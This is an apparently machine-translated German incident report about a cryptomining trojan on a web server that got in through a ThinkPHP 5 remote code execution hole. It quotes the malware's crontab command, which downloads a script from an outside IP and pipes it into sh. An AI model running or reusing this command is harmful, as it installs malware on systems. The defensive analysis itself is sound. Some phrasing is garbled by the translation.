Gestern stellte ich fest, dass ein Server plötzlich langsamer wurde. Top zeigte, dass mehrere Prozesse mehr als 100 % nutzten CPU
Führen Sie den Befehl aus für:
/tmp/php -s /tmp/p2.conf
Es ist fast sicher, dass es gehackt wurde
Der nächste Schritt besteht darin, die Quelle zu ermitteln
Der letzte hat keinen Anmeldedatensatz
Töten Sie diese Prozesse zuerst, aber nach ein paar Tagen erscheint er erneut Minuten
Sehen wir uns zunächst an, was dieser Trojaner tun möchte
Netstat hat gesehen, dass dieser Trojaner einen Port geöffnet und eine Verbindung mit einer bestimmten IP im Ausland hergestellt hat
Aber tcpdump konnte eine Zeit lang keine Datenübertragung feststellen
Was wollte er? zu tun?
Überprüfen Sie weiterhin die Protokolle
Ich habe im Cron-Protokoll festgestellt, dass der WWW-Benutzer einen Crontab-Timing-Vorgang hat, was im Grunde das Problem ist
wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
Ich habe ein paar Fragen heruntergeladen und es mir angesehen, es sollte ein Mining-Trojaner-Programm sein
Server Der WWW-Benutzer auf der Website wurde durch die Installation von lnmp erstellt. Wenn man sich die Quelle ansieht, handelt es sich möglicherweise um eine Web-Sicherheitslücke.
Schauen Sie sich noch einmal an, die Berechtigungen von PHP unter /tmp lauten www
Überprüfen Sie die Protokolle mehrerer Websites unter lnmp und stellen Sie fest, dass es die kürzlich in thinkphp 5 aufgedeckte Sicherheitslücke bei der Remotecodeausführung nutzt
Details zur Sicherheitslücke: https://. Nosec.org/ home/detail/2050.html
Reparieren Sie das Problem und lösen Sie es
Aber diese Seite ist eine Testseite und der Port, der lauscht, ist 8083. Könnte es sein, dass Hacker jetzt anfangen können, unkonventionelle Ports auszuspionieren?
Quelle: https://www.simapple.com/425.html